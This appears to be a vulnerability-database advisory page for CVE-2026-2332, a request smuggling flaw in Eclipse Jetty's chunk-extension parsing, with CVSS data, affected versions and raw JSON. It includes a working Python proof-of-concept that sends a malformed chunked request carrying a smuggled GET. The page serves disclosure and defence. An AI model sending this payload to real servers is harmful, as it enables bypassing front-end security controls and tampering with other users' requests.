Security Vulnerability Report
中文
CVE-2026-2332 CVSS 7.4 HIGH

CVE-2026-2332

Published: 2026-04-14 12:16:21
Last Modified: 2026-05-01 13:31:00
Source: [email protected]

Description

In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the "funky chunks" techniques outlined here: * https://w4ke.info/2025/06/18/funky-chunks.html * https://w4ke.info/2025/10/29/funky-chunks-2.html Jetty terminates chunk extension parsing at \r\n inside quoted strings instead of treating this as an error. POST / HTTP/1.1 Host: localhost Transfer-Encoding: chunked 1;ext="val X 0 GET /smuggled HTTP/1.1 ... Note how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* - VULNERABLE
Eclipse Jetty (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # PoC for CVE-2026-2332: Jetty Request Smuggling via Unclosed Quotes in Chunk Extensions # This script sends a malicious request with an unclosed quote in the chunk extension. def send_smuggling_request(host, port): # Construct the malicious payload # The chunk extension `1;ext="val` is not closed with a quote before CRLF payload = ( "POST / HTTP/1.1\r\n" f"Host: {host}\r\n" "Transfer-Encoding: chunked\r\n" "\r\n" "1;ext=\"val\r\n" # Malformed chunk extension with unclosed quote "X\r\n" # This part might be interpreted as the start of a smuggled request "0\r\n" # Terminator "\r\n" "GET /smuggled HTTP/1.1\r\n" f"Host: {host}\r\n" "\r\n" ) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(payload.encode('utf-8')) print(f"[+] Payload sent to {host}:{port}") print("[+] Check the backend server to see if the request was smuggled.") s.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with target host and port target_host = "localhost" target_port = 8080 send_smuggling_request(target_host, target_port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2332", "sourceIdentifier": "[email protected]", "published": "2026-04-14T12:16:21.333", "lastModified": "2026-05-01T13:31:00.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the \"funky chunks\" techniques outlined here:\n * https://w4ke.info/2025/06/18/funky-chunks.html\n\n * https://w4ke.info/2025/10/29/funky-chunks-2.html\n\n\nJetty terminates chunk extension parsing at \\r\\n inside quoted strings instead of treating this as an error.\n\n\nPOST / HTTP/1.1\nHost: localhost\nTransfer-Encoding: chunked\n\n1;ext=\"val\nX\n0\n\nGET /smuggled HTTP/1.1\n...\n\n\n\n\n\nNote how the chunk extension does not close the double quotes, and it is able to inject a smuggled request."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-444"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.4.0", "versionEndExcluding": "9.4.60", "matchCriteriaId": "E0FB149B-EF33-4A51-9B96-030899E250CC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.0.28", "matchCriteriaId": "361D419A-7A89-439A-99B1-D34E9914BAE8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.28", "matchCriteriaId": "7020D8E5-61DD-4DB6-82E4-EA46A96838A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.0.0", "versionEndExcluding": "12.0.33", "matchCriteriaId": "E1A6095F-3D1E-40CB-A875-D41BF6C73EB3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.1.0", "versionEndExcluding": "12.1.7", "matchCriteriaId": "B5A32954-7B03-46B6-9956-54BE0F8477E8"}]}]}], "references": [{"url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", "Mitigation"]}, {"url": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/89", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.